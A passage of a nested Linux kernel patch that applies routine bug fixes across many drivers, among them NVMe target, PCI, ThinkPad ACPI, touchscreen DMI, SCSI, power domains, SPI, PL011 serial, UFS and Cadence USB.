+ 		spin_unlock(&tport->lock);
+ 		queue_work(nvmet_wq, &tport->ls_work);
+ 		return ret;
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index ce42afe8f64ef..3480768274699 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -1884,6 +1884,7 @@ static void __exit nvmet_tcp_exit(void)
+ 	flush_workqueue(nvmet_wq);
+ 
+ 	destroy_workqueue(nvmet_tcp_wq);
++	ida_destroy(&nvmet_tcp_queue_ida);
+ }
+ 
+ module_init(nvmet_tcp_init);
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 59c164b5c64aa..4086a7818981a 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -6,6 +6,7 @@
+  * Author: Kishon Vijay Abraham I <kishon@ti.com>
+  */
+ 
++#include <linux/align.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ 
+@@ -600,7 +601,7 @@ int dw_pcie_ep_raise_msix_irq(struct dw_pcie_ep *ep, u8 func_no,
+ 	}
+ 
+ 	aligned_offset = msg_addr & (epc->mem->window.page_size - 1);
+-	msg_addr &= ~aligned_offset;
++	msg_addr = ALIGN_DOWN(msg_addr, epc->mem->window.page_size);
+ 	ret = dw_pcie_ep_map_addr(epc, func_no, 0, ep->msi_mem_phys, msg_addr,
+ 				  epc->mem->window.page_size);
+ 	if (ret)
+diff --git a/drivers/pci/msi/irqdomain.c b/drivers/pci/msi/irqdomain.c
+index e9cf318e6670f..34877a1f43a15 100644
+--- a/drivers/pci/msi/irqdomain.c
++++ b/drivers/pci/msi/irqdomain.c
+@@ -60,7 +60,7 @@ static irq_hw_number_t pci_msi_domain_calc_hwirq(struct msi_desc *desc)
+ 
+ 	return (irq_hw_number_t)desc->msi_index |
+ 		pci_dev_id(dev) << 11 |
+-		(pci_domain_nr(dev->bus) & 0xFFFFFFFF) << 27;
++		((irq_hw_number_t)(pci_domain_nr(dev->bus) & 0xFFFFFFFF)) << 27;
+ }
+ 
+ static inline bool pci_msi_desc_is_multi_msi(struct msi_desc *desc)
+diff --git a/drivers/platform/x86/intel/vbtn.c b/drivers/platform/x86/intel/vbtn.c
+index 8e2b07ed2ce94..c10c99a31a90a 100644
+--- a/drivers/platform/x86/intel/vbtn.c
++++ b/drivers/platform/x86/intel/vbtn.c
+@@ -200,9 +200,6 @@ static void notify_handler(acpi_handle handle, u32 event, void *context)
+ 	autorelease = val && (!ke_rel || ke_rel->type == KE_IGNORE);
+ 
+ 	sparse_keymap_report_event(input_dev, event, val, autorelease);
+-
+-	/* Some devices need this to report further events */
+-	acpi_evaluate_object(handle, "VBDL", NULL, NULL);
+ }
+ 
+ /*
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 6edd2e294750e..c2fb19af10705 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10511,6 +10511,7 @@ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		return 0;
+ 	default:
+ 		/* Unknown function */
++		pr_debug("unknown function 0x%x\n", funcmode);
+ 		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+@@ -10696,8 +10697,8 @@ static void dytc_profile_refresh(void)
+ 		return;
+ 
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+-	convert_dytc_to_profile(funcmode, perfmode, &profile);
+-	if (profile != dytc_current_profile) {
++	err = convert_dytc_to_profile(funcmode, perfmode, &profile);
++	if (!err && profile != dytc_current_profile) {
+ 		dytc_current_profile = profile;
+ 		platform_profile_notify();
+ 	}
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 9a92d515abb9b..11d72a3533552 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -50,7 +50,7 @@ static const struct property_entry chuwi_hi8_air_props[] = {
+ };
+ 
+ static const struct ts_dmi_data chuwi_hi8_air_data = {
+-	.acpi_name	= "MSSL1680:00",
++	.acpi_name	= "MSSL1680",
+ 	.properties	= chuwi_hi8_air_props,
+ };
+ 
+@@ -913,6 +913,32 @@ static const struct ts_dmi_data teclast_tbook11_data = {
+ 	.properties	= teclast_tbook11_props,
+ };
+ 
++static const struct property_entry teclast_x16_plus_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 8),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 14),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1916),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1264),
++	PROPERTY_ENTRY_BOOL("touchscreen-inverted-y"),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl3692-teclast-x16-plus.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data teclast_x16_plus_data = {
++	.embedded_fw = {
++		.name	= "silead/gsl3692-teclast-x16-plus.fw",
++		.prefix = { 0xf0, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00 },
++		.length	= 43560,
++		.sha256	= { 0x9d, 0xb0, 0x3d, 0xf1, 0x00, 0x3c, 0xb5, 0x25,
++			    0x62, 0x8a, 0xa0, 0x93, 0x4b, 0xe0, 0x4e, 0x75,
++			    0xd1, 0x27, 0xb1, 0x65, 0x3c, 0xba, 0xa5, 0x0f,
++			    0xcd, 0xb4, 0xbe, 0x00, 0xbb, 0xf6, 0x43, 0x29 },
++	},
++	.acpi_name	= "MSSL1680:00",
++	.properties	= teclast_x16_plus_props,
++};
++
+ static const struct property_entry teclast_x3_plus_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-size-x", 1980),
+ 	PROPERTY_ENTRY_U32("touchscreen-size-y", 1500),
+@@ -1567,6 +1593,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_SKU, "E5A6_A1"),
+ 		},
+ 	},
++	{
++		/* Teclast X16 Plus */
++		.driver_data = (void *)&teclast_x16_plus_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TECLAST"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Default string"),
++			DMI_MATCH(DMI_PRODUCT_SKU, "D3A5_A1"),
++		},
++	},
+ 	{
+ 		/* Teclast X3 Plus */
+ 		.driver_data = (void *)&teclast_x3_plus_data,
+@@ -1741,7 +1776,7 @@ static void ts_dmi_add_props(struct i2c_client *client)
+ 	int error;
+ 
+ 	if (has_acpi_companion(dev) &&
+-	    !strncmp(ts_data->acpi_name, client->name, I2C_NAME_SIZE)) {
++	    strstarts(client->name, ts_data->acpi_name)) {
+ 		error = device_create_managed_software_node(dev, ts_data->properties, NULL);
+ 		if (error)
+ 			dev_err(dev, "failed to add properties: %d\n", error);
+diff --git a/drivers/regulator/pwm-regulator.c b/drivers/regulator/pwm-regulator.c
+index b9eeaff1c6615..925e486f73a6d 100644
+--- a/drivers/regulator/pwm-regulator.c
++++ b/drivers/regulator/pwm-regulator.c
+@@ -158,6 +158,9 @@ static int pwm_regulator_get_voltage(struct regulator_dev *rdev)
+ 	pwm_get_state(drvdata->pwm, &pstate);
+ 
+ 	voltage = pwm_get_relative_duty_cycle(&pstate, duty_unit);
++	if (voltage < min(max_uV_duty, min_uV_duty) ||
++	    voltage > max(max_uV_duty, min_uV_duty))
++		return -ENOTRECOVERABLE;
+ 
+ 	/*
+ 	 * The dutycycle for min_uV might be greater than the one for max_uV.
+diff --git a/drivers/s390/cio/device_ops.c b/drivers/s390/cio/device_ops.c
+index c533d1dadc6bb..a5dba3829769c 100644
+--- a/drivers/s390/cio/device_ops.c
++++ b/drivers/s390/cio/device_ops.c
+@@ -202,7 +202,8 @@ int ccw_device_start_timeout_key(struct ccw_device *cdev, struct ccw1 *cpa,
+ 		return -EINVAL;
+ 	if (cdev->private->state == DEV_STATE_NOT_OPER)
+ 		return -ENODEV;
+-	if (cdev->private->state == DEV_STATE_VERIFY) {
++	if (cdev->private->state == DEV_STATE_VERIFY ||
++	    cdev->private->flags.doverify) {
+ 		/* Remember to fake irb when finished. */
+ 		if (!cdev->private->flags.fake_irb) {
+ 			cdev->private->flags.fake_irb = FAKE_CMD_IRB;
+@@ -214,8 +215,7 @@ int ccw_device_start_timeout_key(struct ccw_device *cdev, struct ccw1 *cpa,
+ 	}
+ 	if (cdev->private->state != DEV_STATE_ONLINE ||
+ 	    ((sch->schib.scsw.cmd.stctl & SCSW_STCTL_PRIM_STATUS) &&
+-	     !(sch->schib.scsw.cmd.stctl & SCSW_STCTL_SEC_STATUS)) ||
+-	    cdev->private->flags.doverify)
++	     !(sch->schib.scsw.cmd.stctl & SCSW_STCTL_SEC_STATUS)))
+ 		return -EBUSY;
+ 	ret = cio_set_options (sch, flags);
+ 	if (ret)
+diff --git a/drivers/scsi/Kconfig b/drivers/scsi/Kconfig
+index 03e71e3d5e5b3..3b990cf2c1954 100644
+--- a/drivers/scsi/Kconfig
++++ b/drivers/scsi/Kconfig
+@@ -1285,7 +1285,7 @@ source "drivers/scsi/arm/Kconfig"
+ 
+ config JAZZ_ESP
+ 	bool "MIPS JAZZ FAS216 SCSI support"
+-	depends on MACH_JAZZ && SCSI
++	depends on MACH_JAZZ && SCSI=y
+ 	select SCSI_SPI_ATTRS
+ 	help
+ 	  This is the driver for the onboard SCSI host adapter of MIPS Magnum
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 7aac9fc719675..0bb7e164b525f 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -1919,7 +1919,7 @@ lpfc_bg_setup_bpl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+  *
+  * Returns the number of SGEs added to the SGL.
+  **/
+-static int
++static uint32_t
+ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 		struct sli4_sge *sgl, int datasegcnt,
+ 		struct lpfc_io_buf *lpfc_cmd)
+@@ -1927,8 +1927,8 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	struct scatterlist *sgde = NULL; /* s/g data entry */
+ 	struct sli4_sge_diseed *diseed = NULL;
+ 	dma_addr_t physaddr;
+-	int i = 0, num_sge = 0, status;
+-	uint32_t reftag;
++	int i = 0, status;
++	uint32_t reftag, num_sge = 0;
+ 	uint8_t txop, rxop;
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	uint32_t rc;
+@@ -2100,7 +2100,7 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+  *
+  * Returns the number of SGEs added to the SGL.
+  **/
+-static int
++static uint32_t
+ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 		struct sli4_sge *sgl, int datacnt, int protcnt,
+ 		struct lpfc_io_buf *lpfc_cmd)
+@@ -2124,8 +2124,8 @@ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	uint32_t rc;
+ #endif
+ 	uint32_t checking = 1;
+-	uint32_t dma_offset = 0;
+-	int num_sge = 0, j = 2;
++	uint32_t dma_offset = 0, num_sge = 0;
++	int j = 2;
+ 	struct sli4_hybrid_sgl *sgl_xtra = NULL;
+ 
+ 	sgpe = scsi_prot_sglist(sc);
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 3cda5d26b66ca..e70ab8db30142 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -328,21 +328,39 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	return result + 4;
+ }
+ 
++enum scsi_vpd_parameters {
++	SCSI_VPD_HEADER_SIZE = 4,
++	SCSI_VPD_LIST_SIZE = 36,
++};
++
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ {
+-	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
++	unsigned char vpd[SCSI_VPD_LIST_SIZE] __aligned(4);
+ 	int result;
+ 
+ 	if (sdev->no_vpd_size)
+ 		return SCSI_DEFAULT_VPD_LEN;
+ 
++	/*
++	 * Fetch the supported pages VPD and validate that the requested page
++	 * number is present.
++	 */
++	if (page != 0) {
++		result = scsi_vpd_inquiry(sdev, vpd, 0, sizeof(vpd));
++		if (result < SCSI_VPD_HEADER_SIZE)
++			return 0;
++
++		result -= SCSI_VPD_HEADER_SIZE;
++		if (!memchr(&vpd[SCSI_VPD_HEADER_SIZE], page, result))
++			return 0;
++	}
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+ 	 * which can not handle allocation lengths as large as
+ 	 * potentially requested by the caller.
+ 	 */
+-	result = scsi_vpd_inquiry(sdev, vpd_header, page, sizeof(vpd_header));
++	result = scsi_vpd_inquiry(sdev, vpd, page, SCSI_VPD_HEADER_SIZE);
+ 	if (result < 0)
+ 		return 0;
+ 
+diff --git a/drivers/scsi/smartpqi/smartpqi_init.c b/drivers/scsi/smartpqi/smartpqi_init.c
+index 47d487729635c..e44f6bb25a8ea 100644
+--- a/drivers/scsi/smartpqi/smartpqi_init.c
++++ b/drivers/scsi/smartpqi/smartpqi_init.c
+@@ -6449,8 +6449,11 @@ static void pqi_map_queues(struct Scsi_Host *shost)
+ {
+ 	struct pqi_ctrl_info *ctrl_info = shost_to_hba(shost);
+ 
+-	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
++	if (!ctrl_info->disable_managed_interrupts)
++		return blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
+ 			      ctrl_info->pci_dev, 0);
++	else
++		return blk_mq_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT]);
+ }
+ 
+ static inline bool pqi_is_tape_changer_device(struct pqi_scsi_dev *device)
+diff --git a/drivers/soc/mediatek/mtk-pm-domains.c b/drivers/soc/mediatek/mtk-pm-domains.c
+index 474b272f9b02d..832adb570b501 100644
+--- a/drivers/soc/mediatek/mtk-pm-domains.c
++++ b/drivers/soc/mediatek/mtk-pm-domains.c
+@@ -499,6 +499,11 @@ static int scpsys_add_subdomain(struct scpsys *scpsys, struct device_node *paren
+ 			goto err_put_node;
+ 		}
+ 
++		/* recursive call to add all subdomains */
++		ret = scpsys_add_subdomain(scpsys, child);
++		if (ret)
++			goto err_put_node;
++
+ 		ret = pm_genpd_add_subdomain(parent_pd, child_pd);
+ 		if (ret) {
+ 			dev_err(scpsys->dev, "failed to add %s subdomain to parent %s\n",
+@@ -508,11 +513,6 @@ static int scpsys_add_subdomain(struct scpsys *scpsys, struct device_node *paren
+ 			dev_dbg(scpsys->dev, "%s add subdomain: %s\n", parent_pd->name,
+ 				child_pd->name);
+ 		}
+-
+-		/* recursive call to add all subdomains */
+-		ret = scpsys_add_subdomain(scpsys, child);
+-		if (ret)
+-			goto err_put_node;
+ 	}
+ 
+ 	return 0;
+@@ -526,9 +526,6 @@ static void scpsys_remove_one_domain(struct scpsys_domain *pd)
+ {
+ 	int ret;
+ 
+-	if (scpsys_domain_is_on(pd))
+-		scpsys_power_off(&pd->genpd);
+-
+ 	/*
+ 	 * We're in the error cleanup already, so we only complain,
+ 	 * but won't emit another error on top of the original one.
+@@ -538,6 +535,8 @@ static void scpsys_remove_one_domain(struct scpsys_domain *pd)
+ 		dev_err(pd->scpsys->dev,
+ 			"failed to remove domain '%s' : %d - state may be inconsistent\n",
+ 			pd->genpd.name, ret);
++	if (scpsys_domain_is_on(pd))
++		scpsys_power_off(&pd->genpd);
+ 
+ 	clk_bulk_put(pd->num_clks, pd->clks);
+ 	clk_bulk_put(pd->num_subsys_clks, pd->subsys_clks);
+diff --git a/drivers/soc/renesas/r8a77980-sysc.c b/drivers/soc/renesas/r8a77980-sysc.c
+index 39ca84a67daad..621e411fc9991 100644
+--- a/drivers/soc/renesas/r8a77980-sysc.c
++++ b/drivers/soc/renesas/r8a77980-sysc.c
+@@ -25,7 +25,8 @@ static const struct rcar_sysc_area r8a77980_areas[] __initconst = {
+ 	  PD_CPU_NOCR },
+ 	{ "ca53-cpu3",	0x200, 3, R8A77980_PD_CA53_CPU3, R8A77980_PD_CA53_SCU,
+ 	  PD_CPU_NOCR },
+-	{ "cr7",	0x240, 0, R8A77980_PD_CR7,	R8A77980_PD_ALWAYS_ON },
++	{ "cr7",	0x240, 0, R8A77980_PD_CR7,	R8A77980_PD_ALWAYS_ON,
++	  PD_CPU_NOCR },
+ 	{ "a3ir",	0x180, 0, R8A77980_PD_A3IR,	R8A77980_PD_ALWAYS_ON },
+ 	{ "a2ir0",	0x400, 0, R8A77980_PD_A2IR0,	R8A77980_PD_A3IR },
+ 	{ "a2ir1",	0x400, 1, R8A77980_PD_A2IR1,	R8A77980_PD_A3IR },
+diff --git a/drivers/spi/spi-hisi-sfc-v3xx.c b/drivers/spi/spi-hisi-sfc-v3xx.c
+index d3a23b1c2a4c5..61bf00dfe9c33 100644
+--- a/drivers/spi/spi-hisi-sfc-v3xx.c
++++ b/drivers/spi/spi-hisi-sfc-v3xx.c
+@@ -377,6 +377,11 @@ static const struct spi_controller_mem_ops hisi_sfc_v3xx_mem_ops = {
+ static irqreturn_t hisi_sfc_v3xx_isr(int irq, void *data)
+ {
+ 	struct hisi_sfc_v3xx_host *host = data;
++	u32 reg;
++
++	reg = readl(host->regbase + HISI_SFC_V3XX_INT_STAT);
++	if (!reg)
++		return IRQ_NONE;
+ 
+ 	hisi_sfc_v3xx_disable_int(host);
+ 
+diff --git a/drivers/spi/spi-sh-msiof.c b/drivers/spi/spi-sh-msiof.c
+index 51ceaa4857249..ec3a4939ee984 100644
+--- a/drivers/spi/spi-sh-msiof.c
++++ b/drivers/spi/spi-sh-msiof.c
+@@ -137,14 +137,14 @@ struct sh_msiof_spi_priv {
+ 
+ /* SIFCTR */
+ #define SIFCTR_TFWM_MASK	GENMASK(31, 29)	/* Transmit FIFO Watermark */
+-#define SIFCTR_TFWM_64		(0 << 29)	/*  Transfer Request when 64 empty stages */
+-#define SIFCTR_TFWM_32		(1 << 29)	/*  Transfer Request when 32 empty stages */
+-#define SIFCTR_TFWM_24		(2 << 29)	/*  Transfer Request when 24 empty stages */
+-#define SIFCTR_TFWM_16		(3 << 29)	/*  Transfer Request when 16 empty stages */
+-#define SIFCTR_TFWM_12		(4 << 29)	/*  Transfer Request when 12 empty stages */
+-#define SIFCTR_TFWM_8		(5 << 29)	/*  Transfer Request when 8 empty stages */
+-#define SIFCTR_TFWM_4		(6 << 29)	/*  Transfer Request when 4 empty stages */
+-#define SIFCTR_TFWM_1		(7 << 29)	/*  Transfer Request when 1 empty stage */
++#define SIFCTR_TFWM_64		(0UL << 29)	/*  Transfer Request when 64 empty stages */
++#define SIFCTR_TFWM_32		(1UL << 29)	/*  Transfer Request when 32 empty stages */
++#define SIFCTR_TFWM_24		(2UL << 29)	/*  Transfer Request when 24 empty stages */
++#define SIFCTR_TFWM_16		(3UL << 29)	/*  Transfer Request when 16 empty stages */
++#define SIFCTR_TFWM_12		(4UL << 29)	/*  Transfer Request when 12 empty stages */
++#define SIFCTR_TFWM_8		(5UL << 29)	/*  Transfer Request when 8 empty stages */
++#define SIFCTR_TFWM_4		(6UL << 29)	/*  Transfer Request when 4 empty stages */
++#define SIFCTR_TFWM_1		(7UL << 29)	/*  Transfer Request when 1 empty stage */
+ #define SIFCTR_TFUA_MASK	GENMASK(26, 20) /* Transmit FIFO Usable Area */
+ #define SIFCTR_TFUA_SHIFT	20
+ #define SIFCTR_TFUA(i)		((i) << SIFCTR_TFUA_SHIFT)
+diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c
+index 301fe376a1206..13558cbd9b82e 100644
+--- a/drivers/target/target_core_device.c
++++ b/drivers/target/target_core_device.c
+@@ -147,7 +147,6 @@ int transport_lookup_tmr_lun(struct se_cmd *se_cmd)
+ 	struct se_session *se_sess = se_cmd->se_sess;
+ 	struct se_node_acl *nacl = se_sess->se_node_acl;
+ 	struct se_tmr_req *se_tmr = se_cmd->se_tmr_req;
+-	unsigned long flags;
+ 
+ 	rcu_read_lock();
+ 	deve = target_nacl_find_deve(nacl, se_cmd->orig_fe_lun);
+@@ -178,10 +177,6 @@ int transport_lookup_tmr_lun(struct se_cmd *se_cmd)
+ 	se_cmd->se_dev = rcu_dereference_raw(se_lun->lun_se_dev);
+ 	se_tmr->tmr_dev = rcu_dereference_raw(se_lun->lun_se_dev);
+ 
+-	spin_lock_irqsave(&se_tmr->tmr_dev->se_tmr_lock, flags);
+-	list_add_tail(&se_tmr->tmr_list, &se_tmr->tmr_dev->dev_tmr_list);
+-	spin_unlock_irqrestore(&se_tmr->tmr_dev->se_tmr_lock, flags);
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(transport_lookup_tmr_lun);
+diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c
+index 69a4c9581e80e..7aec34c090661 100644
+--- a/drivers/target/target_core_pscsi.c
++++ b/drivers/target/target_core_pscsi.c
+@@ -910,12 +910,15 @@ pscsi_map_sg(struct se_cmd *cmd, struct scatterlist *sgl, u32 sgl_nents,
+ 
+ 	return 0;
+ fail:
+-	if (bio)
+-		bio_put(bio);
++	if (bio) {
++		bio_uninit(bio);
++		kfree(bio);
++	}
+ 	while (req->bio) {
+ 		bio = req->bio;
+ 		req->bio = bio->bi_next;
+-		bio_put(bio);
++		bio_uninit(bio);
++		kfree(bio);
+ 	}
+ 	req->biotail = NULL;
+ 	return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
+diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c
+index 0686882bcbda3..fb93d74c5d0b2 100644
+--- a/drivers/target/target_core_transport.c
++++ b/drivers/target/target_core_transport.c
+@@ -3627,6 +3627,10 @@ int transport_generic_handle_tmr(
+ 	unsigned long flags;
+ 	bool aborted = false;
+ 
++	spin_lock_irqsave(&cmd->se_dev->se_tmr_lock, flags);
++	list_add_tail(&cmd->se_tmr_req->tmr_list, &cmd->se_dev->dev_tmr_list);
++	spin_unlock_irqrestore(&cmd->se_dev->se_tmr_lock, flags);
++
+ 	spin_lock_irqsave(&cmd->t_state_lock, flags);
+ 	if (cmd->transport_state & CMD_T_ABORTED) {
+ 		aborted = true;
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index c74eaf2552c32..2f0f05259778a 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1345,11 +1345,41 @@ static void pl011_start_tx_pio(struct uart_amba_port *uap)
+ 	}
+ }
+ 
++static void pl011_rs485_tx_start(struct uart_amba_port *uap)
++{
++	struct uart_port *port = &uap->port;
++	u32 cr;
++
++	/* Enable transmitter */
++	cr = pl011_read(uap, REG_CR);
++	cr |= UART011_CR_TXE;
++
++	/* Disable receiver if half-duplex */
++	if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
++		cr &= ~UART011_CR_RXE;
++
++	if (port->rs485.flags & SER_RS485_RTS_ON_SEND)
++		cr &= ~UART011_CR_RTS;
++	else
++		cr |= UART011_CR_RTS;
++
++	pl011_write(cr, uap, REG_CR);
++
++	if (port->rs485.delay_rts_before_send)
++		mdelay(port->rs485.delay_rts_before_send);
++
++	uap->rs485_tx_started = true;
++}
++
+ static void pl011_start_tx(struct uart_port *port)
+ {
+ 	struct uart_amba_port *uap =
+ 	    container_of(port, struct uart_amba_port, port);
+ 
++	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
++	    !uap->rs485_tx_started)
++		pl011_rs485_tx_start(uap);
++
+ 	if (!pl011_dma_tx_start(uap))
+ 		pl011_start_tx_pio(uap);
+ }
+@@ -1431,42 +1461,12 @@ static bool pl011_tx_char(struct uart_amba_port *uap, unsigned char c,
+ 	return true;
+ }
+ 
+-static void pl011_rs485_tx_start(struct uart_amba_port *uap)
+-{
+-	struct uart_port *port = &uap->port;
+-	u32 cr;
+-
+-	/* Enable transmitter */
+-	cr = pl011_read(uap, REG_CR);
+-	cr |= UART011_CR_TXE;
+-
+-	/* Disable receiver if half-duplex */
+-	if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
+-		cr &= ~UART011_CR_RXE;
+-
+-	if (port->rs485.flags & SER_RS485_RTS_ON_SEND)
+-		cr &= ~UART011_CR_RTS;
+-	else
+-		cr |= UART011_CR_RTS;
+-
+-	pl011_write(cr, uap, REG_CR);
+-
+-	if (port->rs485.delay_rts_before_send)
+-		mdelay(port->rs485.delay_rts_before_send);
+-
+-	uap->rs485_tx_started = true;
+-}
+-
+ /* Returns true if tx interrupts have to be (kept) enabled  */
+ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ {
+ 	struct circ_buf *xmit = &uap->port.state->xmit;
+ 	int count = uap->fifosize >> 1;
+ 
+-	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
+-	    !uap->rs485_tx_started)
+-		pl011_rs485_tx_start(uap);
+-
+ 	if (uap->port.x_char) {
+ 		if (!pl011_tx_char(uap, uap->port.x_char, from_irq))
+ 			return true;
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 9fd4e9ed93b8b..f3c25467e571f 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6159,7 +6159,6 @@ static void ufshcd_err_handling_prepare(struct ufs_hba *hba)
+ 		ufshcd_hold(hba, false);
+ 		if (!ufshcd_is_clkgating_allowed(hba))
+ 			ufshcd_setup_clocks(hba, true);
+-		ufshcd_release(hba);
+ 		pm_op = hba->is_sys_suspended ? UFS_SYSTEM_PM : UFS_RUNTIME_PM;
+ 		ufshcd_vops_resume(hba, pm_op);
+ 	} else {
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index ccdd525bd7c80..2b8f98f0707e7 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -826,7 +826,11 @@ void cdns3_gadget_giveback(struct cdns3_endpoint *priv_ep,
+ 			return;
+ 	}
+ 
+-	if (request->complete) {
++	/*
++	 * zlp request is appended by driver, needn't call usb_gadget_giveback_request() to notify
++	 * gadget composite driver.
++	 */
++	if (request->complete && request->buf != priv_dev->zlp_buf) {
+ 		spin_unlock(&priv_dev->lock);
+ 		usb_gadget_giveback_request(&priv_ep->endpoint,
+ 					    request);
+@@ -2537,11 +2541,11 @@ static int cdns3_gadget_ep_disable(struct usb_ep *ep)
+ 
+ 	while (!list_empty(&priv_ep->wa2_descmiss_req_list)) {
+ 		priv_req = cdns3_next_priv_request(&priv_ep->wa2_descmiss_req_list);
++		list_del_init(&priv_req->list);
+ 
+ 		kfree(priv_req->request.buf);
+ 		cdns3_gadget_ep_free_request(&priv_ep->endpoint,
+ 					     &priv_req->request);
+-		list_del_init(&priv_req->list);
+ 		--priv_ep->wa2_counter;
+ 	}
+ 
+diff --git a/drivers/usb/cdns3/core.c b/drivers/usb/cdns3/core.c
+index 7b20d2d5c262e..7242591b346bc 100644
+--- a/drivers/usb/cdns3/core.c
++++ b/drivers/usb/cdns3/core.c
+@@ -394,7 +394,6 @@ static int cdns_role_set(struct usb_role_switch *sw, enum usb_role role)
+ 	return ret;
+ }
+ 
+-
+ /**
+  * cdns_wakeup_irq - interrupt handler for wakeup events
+  * @irq: irq number for cdns3/cdnsp core device
+diff --git a/drivers/usb/cdns3/drd.c b/drivers/usb/cdns3/drd.c
+index d00ff98dffabf..33ba30f79b337 100644
+--- a/drivers/usb/cdns3/drd.c
++++ b/drivers/usb/cdns3/drd.c
+@@ -156,7 +156,8 @@ bool cdns_is_device(struct cdns *cdns)
+  */
+ static void cdns_otg_disable_irq(struct cdns *cdns)
+ {
+-	writel(0, &cdns->otg_irq_regs->ien);
++	if (cdns->version)
++		writel(0, &cdns->otg_irq_regs->ien);
+ }
+ 
+ /**
+@@ -418,15 +419,20 @@ int cdns_drd_init(struct cdns *cdns)
+ 
+ 		cdns->otg_regs = (void __iomem *)&cdns->otg_v1_regs->cmd;
+ 
+-		if (readl(&cdns->otg_cdnsp_regs->did) == OTG_CDNSP_DID) {
++		state = readl(&cdns->otg_cdnsp_regs->did);
++
++		if (OTG_CDNSP_CHECK_DID(state)) {
+ 			cdns->otg_irq_regs = (struct cdns_otg_irq_regs __iomem *)
+ 					      &cdns->otg_cdnsp_regs->ien;
+ 			cdns->version  = CDNSP_CONTROLLER_V2;
+-		} else {
++		} else if (OTG_CDNS3_CHECK_DID(state)) {
+ 			cdns->otg_irq_regs = (struct cdns_otg_irq_regs __iomem *)
+ 					      &cdns->otg_v1_regs->ien;
+ 			writel(1, &cdns->otg_v1_regs->simulate);
+ 			cdns->version  = CDNS3_CONTROLLER_V1;
++		} else {
++			dev_err(cdns->dev, "not supporte DID=0x%08x\n", state);
++			return -EINVAL;
+ 		}
+ 
+ 		dev_dbg(cdns->dev, "DRD version v1 (ID: %08x, rev: %08x)\n",
+@@ -479,7 +485,6 @@ int cdns_drd_exit(struct cdns *cdns)
+ 	return 0;
+ }
+ 
+-
